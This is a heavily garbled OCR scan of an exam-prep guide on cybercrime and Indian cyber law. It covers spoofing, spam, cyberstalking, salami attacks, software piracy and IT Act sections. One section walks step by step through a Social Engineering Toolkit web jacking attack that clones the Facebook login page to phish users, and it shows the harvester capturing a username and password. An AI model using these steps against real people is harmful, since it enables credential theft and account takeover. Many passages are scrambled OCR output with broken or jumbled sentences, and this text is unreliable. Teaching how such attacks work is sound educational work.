CYBER Secy 

UNIT -1I 

Introduction of cybercrime, challenges of Cybercrim 
classification of cybercrimes — e-mail spoofing, blame, 
internet time theft, salami attack/salami technique... » 
UNIT -Il 

Web jacking, online frauds, software piracy, computer network 
intrusions, password sniffing, identity theft, Cyberterrorism 
u———— i 
Perception of cyber criminals — Hackers, insurgents and 
extremist group etc., web servers hacking, session hijacking 


UNIT - Ill 

Cybercrime and criminal justice — Concent of cybercrime and 

the IT Act 2000, hacking, teenage web vandals, cyber fraud 

and cheating, defamation, harassment and e-mail abuse............ (49 to 


cybercrimes, nature of criminality, strategies to tackle 
cybercrime and trends.................. ee (60 to ij 


UNIT - IV 

The Indian evidence act of 1872 vs. information technology act 
2000 — Status of electronic records as evidence, proof and 
management of electronic records, relevancy, admissibility and 


probative value of E-evidence .................. ed (67 t074) 
Proving digital signatures, proof of electronic agreements, 

proving electronic messages ----.--sscsssessessssssessueesessesessssnsesesssenseectssnnsersese (74 to 86) 
UNIT - V 

Tools and methods in cybercrime — Proxy servers and 
anonymizers, password cracking, key loggers and spyware, 

VITUS and worms, trojan horses, backdoors ............ (87 to 108) 


ME, CHALLENGES OF 
CYBERCRIMES — E-MAIL 
SALAMI 


TO CYBERCRI 


FICATION OF 
CYBERCRIME, CLASSIFTE NET TIME THEFT, 


AMMING 
SPOOFING, ST T TACK/SALAMI TECHNIQUE 


INTRODUCTION 


Q.1. Give the definition of cybercrime. 
Ans. Giving an opinion for defining cybercrime is very di 


definition which was initially given for cybercrime is — 
e conducted in which a computer was directly and significantly 


fficult. The 


“A crim 
instrumental. ” 

Since this definition was not accepted by all, but it give a narrow scope 
for defining “cybercrime”. 

Another definition given for cybercrime is as follow — 

“Any illegal behaviour that targets the security of computer systems and 
the data processed by them, which is directed by any electronic operation, is 
called cybercrime”. 

The term cybercrime besides the “computer crime” has other names also 
such as “Internet crime, E-crime, High-tech crime, computer-related crime 
etc.” Computer crime can be defined in number of ways some of them are as 
follows — 

: (i) A special knowledge of computer technology is essential for 
investigation and prosecution of any illegal act, then this illegal act is known as 
cybercrime. 

(ii) Using computational environment making any financial fraud with 
banks/customers etc. 

(iii) Steal a person's identity, by using a computer and Internet, is 
also a computer crime. 
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Q.2. What are the challenges of cybercrime ? Explain. 
Or 


What are the various challenges of cybercrime ? (R.GPV., Nov, 29, j 
X ) 


Ans. There are many drawbacks of cybercrime in India. Cybercrime ; 
prevented from being addressed in India, just because of these drawback 
Most of the Indians do not report the cybercrimes to law enforcement agencies 
and besides this many peoples in our country are not aware of cybercrime 

On another side there is big drawback that our law enforcement agencies 
are neither knowledgeable nor well equipped for cybercrimes. The law 
enforcement agencies in our country should be trained. All the cities of our 
country have not cyber cells. Some investigating officers with the police force 
may be well equipped to fight cybercrime. 

There is legal deficiency in our country against cybercrime. We have dedicated 
law enforcement agencies which are fully aware of cybercrime. There are very 
few cybercrime courts where expertise in cybercrime can be utilized. If a law is 
not enforced with a true spirit, however it is theoretically effective, then it is of 
no use. Besides this another challenge is that law enforcement machinery is not 
well equipped to deal with the cyberlaw offenses. Since judiciary is an important 
part of law so there the savvy judges are needed in courts, who are aware about 
crime. The officers in the cyber cell should be trained with good technical 
support and equipments. Judges should also be trained with cyberlaws because 
the judicial system preserves the law and order in the society. 

Various laws on cybercrime and appropriate changes in Indian IT act are 
needed. Expedition of cybercrime is also needed. Investigating officers of | 
cybercrime should be guided on cyberforensic tools and strategies in our 
country. Everybody should learn constantly about cybercrime and its ever- 
growing developments all across the world. It means that a training and 
orientation on cybercrime for judiciary and the lawyers is needed. 

To overcome these challenges there should be workshop or street dramas 
among the peoples so that the peoples will be aware of cybercrime and it's! 
related laws and acts in our justice system. The conferences and peres 
should also be organized in all parts of our country. Some small advertisements 
and messages should be displayed on televisions or mobiles on cybercrime 
and it's related frauds. 


Q.3. Define the term 


Ans. Cybercrime — Refer to Q.1. 
ification o 
ification — The classifica r 
T row Sense — |n this classification 


i ime in Nar. th | 
(i) Cybercrime š i jon the target of ,' "ie role of 
bject. In this classification gi the crime ig iter 


cybercrime. Give the classification of. 


o 3 
(R.Gp ybercrime. 


^ Nov, 2018) 


f cybercrime is as follow, 
8 — 


computer is as an O 
p^ t4 


. Unit -1 5 
information stored on a computer or computer itself. 


Hacking, Computer sabotage etc. €. DDoS attacks, 


(ii) Cybercrime in Broad Sense — In this classification, the role of 
computer is as the environment or context. In this classificati ees 
substantial role is played by the computer or information stored on dices anes 
in act of crime. But in this act the computer contain the evidence a 
e.g, Bank robbery or Murder by using techniques of computers. ae 

Besides this the classification of cybercrime is also done én the basis of 
different categories of crime. This classification is shown in fig. 1.1 ° 


Classification of Cybercrime 


Cybercrime Cybercrime Cybercrime Cybercrime 
Against Individual Against Property Against Organization Against Society 
E-mail Spoofing Credit Hacking Forgery 
Online Frauds Card Password Sniffing 
Š Frauds 
Spamming E-mail Bombing 
Phishing Intellectual Virus Attacks Cyber- 
Cyberstalking eae Salami Attacks/ terrorism 
and Harassment — Salami Techniques 
Cyberdefamation Internet DoS Attacks Web 
Computer Sabotage aoe Logic Bomb Jacking 
Password Sniffing s Trojan Horse 
Software Piracy 
Computer Network 
Intrusion 


Fig. 1.1 Classification of Cybercrime 

Q.4. Explain the categories of cybercrime. 

Ans. Categorization of cybercrime is as follows — 

.. (i) Crime Targeted Against Individuals — These kind of crime are 
exploited because of human weakness like greed and naivety. Financial frauds, 
Sale of non existent items, child pornography, harassment, copyright violation 
etc. are example of this crime. As the Internet is developing day by day the 


criminals are exploring them with new tools that are expanded to a large number 
Of victims, 


is ES En ime Targeted Against Property — The stealing of mobile devices 

(PDAs) an "v this category. Cell phones, laptops, personal digital assistant 

Programs th removable medias (CDs and pen drives); transmitting harmful 

Om hard = can disrupt functions of the systems and/or wipe out the data 
isk etc., are the examples of this type of crime. 
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(iii) Crime Targeted Against Organizations — The crime again 
n include cyberterrorism. In this crime computer took 
o terrorize the citizens of a country by stealing s 
the programs. 


government/organizatio 


and Internet are used t 
hacking the private information and also to damage 


bercrime as a Single Event — In this crime single attack jg 
stem e.g., opening an attachment that may contain 


This crime includes hacking or fraud. 


a Series of Event — In this crime the attackers 


(iv) Cy 
performed on the victim's Sy: 
virus and infect the system. 


(v) Cybercrime as 


attack on victim's system repeatedly. 
e.g., interacting with the people/victim on phone and/or via online chat to 


establish relationship first and then this relationship is exploited to commit the 


sexual assault. 


Q.5. Write a short note on e-m (R.GP.V., Nov. 2018) 


ail spoofing. 
Or 
Write short note on IP spoofing. 


(R.GP.K., Dec. 2003, 
Or 


What do you understand by IP-spoofing ? 
Or 

What do you mean by IP spoofing ? 

Ans. The most common type of spoofing that you are likely to encounter 
is IP spoofing, used primarily to spoof the source address of e-mail. In this 
case, an e-mail message looks like it comes from one address, when in fact it 
comes from somewhere else instead. The intent is to trick the user into thinking 
the e-mail comes from a trusted source so that the user will open the e-mail 


and act on it in some way. 
E-mail spoofing can be used 
(i) Delivera phishing messa 


dential information). Replying to 
e-mail will take 


June 2004, Dec. 2010, June 2011) 
(R.GP.K., June 2017) 


(R.GP.V., Nov. 2019) 


two- 
ge (one that cons the user into divulging 


the e-mail won’t work properly, but 
the user to a spoofed Web site. 

Iware payload, such as à virus, worm, or Trojan 
an attachement that must be downloaded 
ed into the e-mail so that all the user needs 
talls itself when the e-mail is opened). 
fing tricks is to use the contents of 
chine as the sources of spoofed 
then you know that your 


confi 

clicking on links in the 

(ii) Deliver a ma 

horse. The malware may come as 

(and perhaps executed) or may be codec 

to do is open the e-mail. (The malware ins 

One of the more annoying e-mail spoo 

the e-mail address book on à compromise? inst 

e-mail. If you happen to receive an jae x 
address has been harvested and used in 


Unit-1 7 
The response generated by the spoofed e-mai 
; -mail was i 
a virus. On the target machine the mailer daemon caught iie Pici di red 
the delivery of the e-mail. The response e-mail was sent to the s ood s 
surprising the recipient because the owner of the spoofed add i erp 
send the e-mail with the attached virus. ia 

A spoofed e-mail is easy to detect by examini 

I : A ning the e-mai 
information and is something technologically savvy ien can nere qn 
so. While in other spoofing attacks, we cannot stop the spoofer from se di : 
the spoofed message. iio 

Q.6. What are various ways to avoid e-mail spoofing ? 

Ans. If the users of an organization are not enough knowledgeable to 
understand an e-mail header, then there are some other ways given below that 
can be used to avoid much of the damage from e-mail spoofing — 

(i) Users can be trained to download attachments from untrusted 
sources. Depending on the nature of organization, the e-mail attachments can 
be blocked. 
(ii) Users of organization should avoid address book software, such 
as Microsoft Outlook, that is vulnerable to surfing by malware. This can go a 
long way to prevent the addresses in an address book from being used as 
spoofed addresses. j 
l (iii) Users can be taught to be skeptical about e-mail that promises 
something that is too good to be true, even if that e-mail appears to come from 
a trusted source. The source could be spoofed. 
" (iv) Remind users frequently that well-known sites like PayPal, Paytm, 
edi never ask for confidential information in an e-mail, nor do they 
a E inks in e-mail to pages that ask for such data. If a user wants to 
: nie dE RM. cii option, he or she should use the browser directly. 
i 3 
NE. e other hand the e-mail server software should be updated frequently, 
can have most recent virus filters. 


pis opi you mean by spamming ? Explain in brief. 

an e-mail with ot xe nd be not easy to define spam. The process of forging 
spamming, and these ntent without the user’s knowledge, is known as 
mails are assumed a ypes of mails are known as spams. These types of 
unsolicited conical i example of abuse. Some peoples called these as 
Bt unsolicited mails S mail. But sometime we desire and feel happy while we 
ut there Were ma i| 9me people called spam as automated commercial mails. 
and not cömiercial 1 mails that were unsolicited and sometimes automated 

1n nature. Hence covering all these aspects we can define 


Spams 
as px 
unsolicited ang automated e-mails 
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Since, there is more than 80% use of Internet therefore e-mail s " 
affects a large number of Internet users. Because of economic UM è 
spamming is difficult to control. Since there is no amount for ciun 
management of list, have to pay by the advertisers, so it is difficult to So 
senders accountable for their mass mailings. Since the barrier to entry is ie 
so high, the amount of unsolicited mails has increased very much even tuih 
these are few spammers. The costs of lost of productivity and fraud for 
spams are borne by the people and Internet service providers. 

Another example of spamming is ‘search engine spamming’, in which a 
document is created or altered with the motive to mislead an electronic catalog 
or filing system. These who are continually attempting to spam a search engine 
can be excluded from the search index. To be not excluded from web publishing 
we should avoid the following web publishing techniques — 

(i) Keywords should not be repeated 
(ii) Keywords should not be used that are not related to the contents 


on the site. 
(iii) There should not be IP cloaking. 
(iv) Color text on the same color background should not be used. 


(v) There should be no hidden links. 


Q.8. How can we avoid spamming ? 


Ans. There are several ways to avoid spamming, some of them are as 


follows — 

(i) Limitation of 
Place- Targets of spammers 
of personal web pages. These 
cruising the Internet hunting. 
web-page, find a way of disguise it. We sh 
that place member e-mail addresses online. 

(ii) Stop Ourselves from Filling Out Online forms that Require 
E-mail Addresses — We should avoid if we can to give our e-mail addresses 
while we are filling any kind of forms, including online forms that ask for 
them. We should fill e-mail address only when replies are to be done online. 

(iii) Use of E-mail Addresses Not Easy to Guess — We know that 
passwords can be guessed successfully and now spammer are also trying to 
guess e-mail addresses. To do this start with sending mails to addresses with 
short stem personal fields on common ISPs such as Yahoo, Gmail, hotmail etc. 


(iv) We should use Multi 


e-mail address for business purpose strictly ar 
use a dif 


E-mail Address Posted in a Public Electronic 
are the e-mail addresses that posted at the bottom 
addresses are harvested by perfect method of 
If we must put personal e-mail on a personal 
ould opt out the job, professional 


le E-mail Addresses — We should use one 
nd multiple e-mail addresses for 
Wa ‘oun Terent e-mail address while filling forms í 

t £ an " 
sther purposes. We C4 
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ious personal business and pleasure. Doing so this will be easy to 
e who sells our e-mail addresses. On which form and to whom, 
was used noting this one can easily track, who is causing 

time disposable e-mail addresses which can used 


ponser! 
d cms address 
am. Now there are one 
with little efforts. ——— 
(y) Spam Filtering — Spam filters should be used either at the network 
level oF application level to block unwanted e-mails always. In both cases the 
is prevented to reach the user by the filter. Many Internet service providers 
ane offering spam filters. 
0.9. Define the term cyberstalking. How can we tackle this cybercrime? 
(R.GP.V., Nov. 2018, 2019) 


Ans. The word cyberstalking has two words — Cyber and stalking. Cyber 
ans the information and communication technologies such as Internet while 
ns the act of watching or following someone for a period of long 
berstalking combindly defined as the individual or group of 
he communication and information to harass the another 
s. The examples of cyberstalking are as follows — 


me 
stalking mea! 
time. So the cy 
individuals uses t 
person or group of person 

(i) False accusation 

(ii) Monitoring and transmission of threats 

(iii) Solicating the minors for sexual purposes 

(iv) For harassing someone gathering information about him/her 

(v) Damaging the data or equipment. 

Cyberstalking also involves the repeated conduction of harassment and 
threatening by an individual, who uses Internet as communication medium. 
The most of the victim's of cyberstalking are women and most of the 
cyberstalkers are men but in some cases are there where the victim are men 
and the cyberstalker are women. 

PR E oy vem in which cyberstalkers have prior relationship and 
ND RUN dicus E iig this relationship then cyberstalking begins 
s dumm ss/subordinate, neighbour etc. Cyberstalking can be tackled 
g ways — 
sdb bag prm e ine s personal informations such as — Phone 
scctes these informatione. ground etc. in public places, where anyone could 
eria to establish a connection with victim by making 
tioner cyberci m then it should be reported to the nearest 


calls or s 
Police si 


(iii) If st i i 
favour them ois enti 1s sending repeated e-mails asking for favours do not 
Port it to the cybercrime cell or police station. 


e 
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Q.10. Explain the working procedure of cyberstalking. 
Ans. There are following ways in which cyberstalking works — 
(i) Repeated e-mails are sent to the victim, asking them for vari 
Ou 


kinds of favour or harassing them. 
(ii) The victims are contacted through e-mails by sending them i 
e 


letters, threatening or can be sexually exploit. The name and mail Id of stalkers 


may not be actual. 
(iii) Cyberstalker collects the personal information of victim, such ag 


address. family details, telephone number of residence as well as office, mobile 


number e-mail Id etc. 
(iv) Stalkers try to establish a connection to victim through mobile/ 


phone and if the connection is established they start to make calls to the 


tele 
victim for harassing or threatening them. 


(v) The victim’s personal information can be posted on any illegal 
bsite or dating services etc. They post 


site such as sex worker’s service we 
e information and inviting the people to 


information as the victim is posting th 
call the victim on the given contact details to have sexual services. 
(vi) The people who come across the information, ask the vict 


sexual services or relationships by contacting them on given details. 
(vii) Since e-mail account of victim is registered on pornographic 
and sexual sites by the stalker the victim receives the such kind of unsolicited 


im for 


e-mails. 
Q.11. What do you mean by Internet time theft ? Explain. 
t has become a necessity for everyone. 


But the Internet time we paid hard money for is being stolen by an unauthorized 
person then what should we do ? When an unauthorized person uses the 
Internet hours of another person who has paid for it, then it is called Internet 
time theft. The unauthorized person gets access to another person's ISP user 


ID and password either by hacking or by illegal means without that person's 
der hacking. Though we can identity time 


knowledge, so this act comes un 
theft if our Internet time has to be recharged frequently while, the use of 
Internet is infrequent. The Internet time theft is a crime related to the crime 


conducted through "Identity Theft". 
An identity theft involve h theft and fraud, therefore the provisions 


with regard to forgery as provi C, 1860 is often invoked along 
with the IT Act 2000. 


The Information Technol 
deals with the lagislation in In 


Ans. In these days the use of Interne 


s bot 
ded under the IP 


t), 2000 is the main act which 


ogy Act (IT Ac 
ng cybercrimes. Some sections 


dia for governi 
p 
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g with cyber theft are — 
_ If without permission of owner any person damages 


(IT 2000 Act dealin 
o 
y compensation to the person so 


(i) Section 43 t 
hen he/she shall be liable to pa 


n 66 — If any person, dishonestly or fraudulently, does any 
tion 43 he/she shall be punishable with imprisonment for 


(ii) Sectio. 
o three years or with fine which may extend to *5 


to in Sec 
ich may extend t 
Lakh or with both. 

— [f a person dishonestly receives stolen computer 


sj) Section 66B t 
ii) vices shall be liable for punishment with 
ars or with fine 


or communication de 


--onment for a term which may be extended upto three ye: 
extend to rupees one lakh or with both. 

(iv) Section 66C— The person who fraudulently or dishonestly make 

f the electronic signature, password or any other unique identification 

erson, shall be punished with imprisonment of either 

ded upto three year and shall also be 


am ther p 
re of any O S 
ped aterm which may be exten 


iption for 
s a fine which may extended one lakh rupees. 
(v) Section 66D — It was inserted to punish cheating by impersonation 


using computer resources. 


12. What is the salami attack ? How information can be gathered 


through salami technique ? (R.GPV., Nov. 2018) 
Ans. A fraudlent action by altering of systems for committing financial 
crimes. These alterations are so insignificant that nobody will notice this. The 
alterations in the systems can be done by either modification or insertion of 
malicious program and the main motive of this is financial gain. The salami 
at can be repeated many times. 


attack is considered as a minor attack th 
nt of money can be stolen from each customer’s 
this purpose the bank employee can modify 


eg. a very small amou 
amount from each customer’s account 


account in a particular bank. For 


the program for deducting a small 
every month and doing so the employee will make a sizable amount every 


a aie the amount will be so small (say €1) that no customer will 
kea : spinon This type of attack is used for committing financial 
Fui s is common and occurs within financial related organizations. 
: nina action will not be noticed by only account holder or customer. 

of e can also be used to gather information over a period 
information "m is m picture of an organization. The distributed 
can be built pe y e ofan individual oran organization. A whole database 
ata collected from sites, advertisements, documents 


Cw 
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collected from trash cons. This data can be intelligent about th 
amount of misappropriation is just below the threshold of perc © targe, ing 
to be more vigilant. Careful examination of our assets, iin Wen e 
other dealing including sharing of confidential information is Every 
rS might 


help reduce the chances of an attack by this method. 
0.13. How can we identify the salami attack ? How can th 
e Salami 


attacks be prevented ? 
Ans. The only way to detect salami attack is to perform rigor 

box testing, in which each and every line of code which is eus Wii 
checked. This is the only way to identify the salami attack, But thi Paid. 
way. i ii only 
A company that protects personal account information has to be o 
lookout for individuals who wish to put them in a compromising m : y 
when it comes to another’s funds. It is also important to know how to ie 
this from an angle that is highly sophisticated. Some of the ways to mee 
this from salami attacks are as follows — 

(i) An organization should update the security of the system as high 
as possible so that attacker could not take advantages of any loophole. By 
doing so the attacker will not be familiarize with the way the framework 


designed. 
(ii) Banks should also advise customers on reporting any kind of 


money deduction that they were a part of and that they were not aware. 
Whether the amount is small or big, the banks should encourage the customers 
to come forward and openly tell them that this could be an act of fraud. 

: (iii) The most important thing is that the customers should not store 
information online ideally, when it comes to bank details. But this fact cannot 
help that the banks rely on a network that has hooked all customers onto à 
common platform of transactions that require a database. The safe thing to do 
is to make sure the bank/website is highly trusted and has not been a part of 
slanderous past that involved fraud in anyway. 

Q.14. Write a short note on cyberdefamation. 

Ans. “Harming the reputation ofa person either by words that are spoken 
or intended to be read or by visible representation or by publishing any 


efame that person". 
kes place in electronic form then it is called 


imputation is said to d 
hen a person is defamed by either using à 


When the above statement ta 
cyberdefamation. It means that w 
computer or Internet then it is cyberdefamation. 

e.g., A defamatory matter of a person published on web by someone else. 
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dde s formed according to the IPC section 499 regarding 
ation are as follows — 
(i) Ifany kind of imputation hai 
ful to the feeling o 


intended 10 be hurt 


rm the reputation of that person and is 


f his family may be considered as 


gan imputation about a company or an association may be 


reputation unless that 


tions do not harm the person's 
f that person will not 


ii) The imputa ; 
tions owers the moral or intellectual character o 
imputat! 
im? nsidered as defamation. 
li types of defamation, 


There are two 9. 
der (is oral defamation). f l , , 
si iure the reputation of person of ordinary intelligence in 
person but if there is no damage to 
de allegation of defamation then 


Libel (is written defamation) and 


words that inj 
i mil be assumed that 1t defame the 
gii person has ma 


" j d the 
rson's reputation an à 
a person may be held for defamation. 


9.15. Write short notes 0n the following — 
(i) Data diddling 
(ii) Forgery 
(iii) Newsgroup spam/crimes emanating 
(iv) Industrial spying/industrial espionage. 

Ans. (i) Data Diddling — The alteration of raw data just before the 
processing of it by computer, and again changing it back after the processing 
is completed, is known as data diddling. When private parties computerized 
their systems, many Electricity Boards in India have been the victims to data 
diddling programs inserted. 

(ii) Forgery — The use of sophisticated computers, printe 
scanners can forged the currency notes, postage and revenue stamps. There 
are many institutes outside, also who are soliciting the sale of fake marksheets 
oreven degree certificates. These marksheets and degree certificates are made 
ma high quality of computers, printers and scanners. Now a days it has 
nea a money growing business involving large monetary amount given to 

gangs to exchange for these bogus but authenticate looking certificates. 


CA f ss e irit Spam/Crimes Emanating from Usenet Newsgroup — 
multiple postin e m 3g of spamming. The term “spam” meant the excessive 
ever, because o Pon à ) Usenet is now more attractive to spammers than 
Lmail spams we invention of Google Groups and its large usenet archive. 

re actually supported by spamming of usenet newsgroups. 


from usenet newsgroup 


rs and 


i V 
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The title “Global Alert for All : Jesus is coming soon” was th 
senet spam and it was posted by Clarence L. Thomas IV, a » first 
£ Stem 


recognized u 
8 January 1994. 


admin of Andrews University on 1 

(iv) Industrial Spying/Industrial Espionage — The corporations 
spy on enemy like governments, so the spy is not limited to ever 
Better opportunities for espionage are provided by the Internet and vas 
networked systems. An activity known as “Industrial spying” is abina 
the information above product finances, research and development s 
marketing strategies. The industrial spy is as old as the industries onde 
Similarly using Internet to achieve this is as old as Internet itself. Es 

Since the Trojans and spyware materials are now becoming availab] 

-skilled people are now expected to generate high profit Uie 


publically, the low 
The aspect of industrial spying will be included to fight 


of industrial spying. 
against cybercrime. 


WEB JACKING, ONLINE FRAUDS, SOFTWARE PIRACY, 
COMPUTER NETWORK INTRUSIONS, PASSWORD SNIFFING, 


IDENTITY THEFT, CYBERTERRORISM, 
VIRTUAL CRIME 


Q.1. What is web jacking ? Explain with example. 

Ans. The name web jacking is derived from hijacking. This method is 
used in social media where hacker takes control of a website fraudulently. It 
can be done by either changing the content of the original site or even redirect 
the user to another fake similar looking page controlled by him. In web jacking 
the owner of the website has no control and the attacker may use the website 
for his own selfish interest or for fulfilling political objectives for money. 
There are many cases where the attacker has asked for ransom and even 
posted obscene material on the site. A clone of the website can be created by 
using the web jacking method and it can be presented to the victim with the 
new link saying that the site has moved. 

When we have our cursor over the link provided, the URL presented will 
be the original one, and not the attacker’s site. But when we click on the new 
link, it open and is quickly replaced with the malicious web server. Here the 
name of the site on the address bar will be slightly different from the original 
website, that can trick the users into thinking it’s a legitimate site e.g., “gmail” 
may direct us to ‘gmail’, where / is replaced by 1. Obviously it can be looked 


that it’s not “gmail.com” but people still click the web. 
Web jacking can also be done by sending a counterfeit message to the 
false identity asking 


registrar controlling the domain name registration, under a i 
him to connect a domain name to the web jacker's. Thus, IP address sending 
unsuspecting consumers who enter that particular domain name to à website 
controlled by the web jacker. The purpose of this attack is to try gam the 
credentials such as user names, passwords and account numbers of users by 
using fake web page with a valid link which opens when the user 1$ redirected 


to it after opening the legitimate site. 


——=—— | 


> | ee 
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e of web jacking is, messages are sent to people by - 
t they have won lottery and to claim to this amount the ng 
link where a form is opened after clicking that link ; y ate 
information like name, address, mobile number. E i 
account and other related informations are asked , 

e attackers hacks their bank account. 


e.g., an exampl 
believe them tha 
asked to click the 
form all personal 
telephone number, ac 
using these informations th 
0.2. Discuss the method of web jacking in detail. 


Ans. The web jacking attack vector isa phishing technique that can be 
used in social engineering engagements. A fake website is created by usin 
this method, and when the victim opens the link a page appears with th 
message that the website has moved and they need to click another link. If the 
victim clicks the link he will be redirected to a fake page that looks real, 

This kind of attack has already been included in Social Engineering Toolkit 
(SET). So now we shall use the SET to implement this method in the following 
steps — 

Step-1 — Firstly we shall open SET and select the option 2 which is the 
website attack vectors, as shown in fig. 2.1. 


ffi 
and thug 


Select from the menu; 


1) Spear-Phishing Attack Vectors 

2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 

5) Mass Mailer Attack 

6) Arduino-based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Access Point Attack Vector 

9) QR Code Generator Attack Vector 
10) Third Party Modules 


99) Return back to the main menu. 
set>2 


Fig. 2.1 Social Engineering Toolkit 


Step-2 — Now in website attack vectors we see a list with available web 


attack methods. Here we are going to select option 6 which is web jacking 
attack. The list of website attack vectors is shown in fig. 2.2. 


1) Java Applet Attack Method 

2) Metasploit Browser Exploit Method 

3) Credential Harvester Attack Method 

a Tabnabbing Attack Method 

3 un Left in the Middle Attack Method 
eb Jacking Attack Method 


7) Multi-Attack Web Met 
: hoi 
8) Victim Web Profiler P 


9) Create or Import a CodeSigning Certificate 


99) Return to Main Menu 
Set:-webattack » 6 


Fig. 2.2 Website Attack Vector 
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king attack menu we have three options — 


-3 - Now in web jac 
P (iii) Custom import. 


(i) Web templates (ii) Site cloner 
elect the site cloner in order to clone the website of our 


Ste 


Here we will s! 
interest. Note 


thod so we 
field. Template of web ja 


that this type of attack works with the credential harvester 
need to choose a website that has username and password 
cking attack is shown in fig. 2.3. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 


set: webattack» 2 
[*] SET supports both HTTP and HTTPS 


[*] Example : http://www.thisisafakesite.com 
set:webattack > Enter the url to clone:www.facebook.com 


{*] Cloning the website: https://login.facebook.com/login.php 
[*] This could take a little bit.... 


The best way to use this attack is if username and password form 
fields are available. Regardless, this captures all POSTs on a website. 
* [*] | have read the above message. [*] 


Press {return} to continue. 


Fig. 2.3 Web Jacking Attacks 


Step-4 — Now for site cloning we choose the site with username and 
password credentials. For this purpose we can select facebook because of it's 
popularity in which are moved to the link of new website. Now it is the time to 
send our link with our IP address to the victim. Let's see what the victim will 
see if he opens the links, as shown in fig. 2.4. 


T m-—-— 


e9 mM EL pe 
J % Google DDUITEFI-ETUUEITU"ENECDCOONEN CE I 


| dp Favorites |i je) Suggened Stes v qe Web Shce Gallery © 


D) Connecting... "n *ospo- Pager Hey Tock Qe 


The site https://login.facebook.com/login.php has 
moved, click here to go to the new location. 


Fig. 2.4 Site Cloning 


| 
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z As we can see à message will appear informing the u 

Step ^ ew location. The link on the message see 

Il click on the link. At that time a new pai 


Ser that the 


has moved to à n ms valiq 


website 


: : 
cious users WI ms 
; unsuspicioUs À | | a : 
int the victim's browser which will be fake and is running on Clone M 
into Lie 
server as shown 1n fig. 2.5. 
facebook 


Up| Facebook helps you connect and share with the people in your life. 
Sign Up] Fa 


Facebook Login | 


| Email address : 


Password : 


———— d | 


C] Keep me logged in 


EC or Sign up for Facebook 


| Forgetten your password? 


Fig. 2.5 Fake Facebook Page 


Step-6 — If the victim enters his credentials into the facebook page that 
ooks like real one then the attacker will be able to capture his username and 
password as shown in fig. 2.6. 


[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link 

[*] Social Engineer Toolkit Credential Harvester Attack 

[*] Credential Harvester is running on port 80 

[*] Information will be displayed to you as it arrives below : 

172.16.56.128 - - [23/Mar/2012 14:42:17] *GET/HTTP/1.1" 200- 
Blackbox.home - - (23/Mar/2012 14:46:01] *GET/HTTP/1.1" 200- 
Blackbox.home - - [23/Mar/2012 14:46:06] *GET/index2.html HTTP/1.1"200- 
[*] WE GOT A HIT: Printing the output : 

PRAM : post form id bedf6447a24eea6465074ce20cedc88F 


PRAM 
PRAM 
PRAI 
PRAI 
PRAI 
PRAI 
PRAI 
PRAI 
PRAI 
PRAI 


THAN 9 lgnis = 1332513966 

LE USERNAME FIELD FOUND : email =test@pentestlab. wordpress.com 
POSSIBLE PASSWORD FIELD FOUND : pass =letmein 

PRAM : defalt persistent=0 


I"I] WHEN YOU'R FINISHED, HIT CONTROL-C TO GENERATE A REPORT. 


Fig. 2.6 Capturing the Credentials 


Unit-ll 19 

0.3. Write a short note on online frauds. 
- Hacking involves a few major types of crimes such as website 
Ans. e-mail security alerts etc. The authentic looking websites that are 
spoofing, oof are created in spoofing website and e-mail security threats. 
known ere make user to enter personal details which will be used by 
These pe access business and bank accounts. This type of online fraud is 
attacker in banking and financial sector. There are number of organizations 
oett e-mails which usually has a link to spoofed website. In these e- 
ir nie e are asked to enter the user Id and password on spoofed website 
ic hackers can retain these information. So we should not provide our 


sensitive information like bank account details on these sites even if the page 


seems legitimate. 

It may be possible in virus hoax e-mails that warnings are genuine, so 
there is always a confusion that we should take it lightly or seriously. A good 
solution that we should go first by visiting an antivirus site such as McA fee or 
other before taking any action. 

Sometimes users get lottery messages on e-mails or letter that he/she has 
won the lottery. To claim the amount of lottery the personal information such 
as name, address, bank account number, mobile number, etc. are asked from 
users, so that money can be directly transferred to customers’ account. Then 
banking details are used for other frauds and scams. 


Q.4. Write a short note on software piracy. 
Or 
What do you mean by software piracy ? (R.GP.V., Nov. 2019) 


Ans. The illegal copying, distribution or use of software is known as 
software piracy. Since it is such a profitable business that it has caught the 
attention of organized crime groups in a number of countries. The act of 
stealing software that is legally protected is also known as software piracy. It 
was shocking that in 2006 the 35% of softwares in all over the world were 
illegal. This was amounted to about $40 billion loss due to software piracy. 


When we purchase a commercial software package, an end user license 
agreement (EULA) is included to protect that software program from copyright 
infringement, In the terms and conditions of license it is stated that we can 
install the original copy of software bought on one computer and that we can 
make a backup copy in case the original is lost or damaged. 


Software piracy mainly applied to full-function commercial softwares. 
The function-restricted or time-limited versions of commercial software are 
not pirated because they are freely available. Similarly the softwares that are 


cle but freely available at no charge called ‘freeware’ are also not 
Pirated, 


(R.GP.K,, Nov. 2018) 
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Q.5. Explain the types of software piracy. Also discuss the dangers of 


software piracy. E . 
Ans. The variety of pirating techniques explains how some ind 


á à ivid 
pirate softwares according to their need. The types of software Piracy ae 
as 
follows — . 
(i) Softlifting — It is a most common type of software Piracy, jt is 
oa 


variety of software piracy in which someone purchases one Version of th 
software and downloads it onto multiple computers, however accor 
software license terms it should be downloaded only once. This type 
software piracy often occurs in school or business environments and he 
usually the motive is to save money. 

(ii) Client-server Overuse — When many people on a network Use 
one main copy of the program at the same time, then it is called Client-server 
overuse. This often occurs when businesses are on a local area network and 
download the softwares for all employess to use. This becomes software 
piracy if the license does not entitle us to use it multiple times. 

(iii) Hard Disk Loading — In this type someone buys a legal Version 
of the software and then copies or installs it onto computer hard disks, and 
sells the product. 

(iv) Counterfeiting — When computer programs are illegally duplicated 
and sold with the appearance of authenticity then counterfeiting occurs. The 
counterfeit softwares are sold at low prices in compare of legitimate software, 

(v) Online Piracy — When illegal software is sold shared or acquired 
by means of the Internet then it is called online piracy or Internet piracy. This 
is usually done through a peer-to-peer (P2P) file sharing system, which is 
usually found in the form of online auction sites and blogs. 

The dangers of software piracy are as follows — 

(i) There are a lot of chances that the software will malfunction or fail. 

(ii) Forfeited access to support for the program such as training, 
upgrades, customer support etc. 

(iii) No warranty and software cannot be updated. 

(iv) Increased risk of infecting PC with malware, viruses or spyware. 

(v) PC can be slow down. 

(vi) Legal action due to copyright infringement. 


ding to 


Q.6. What is intrusion ? 


Ans. An intrusion is a deliberate unauthorized attempt, successful or noh 
to break into, access, manipulate, or misuse some valuable property and where 
the misuse may result into or render the property unreliable or unusable. The 
person who intrudes is an intruder. 
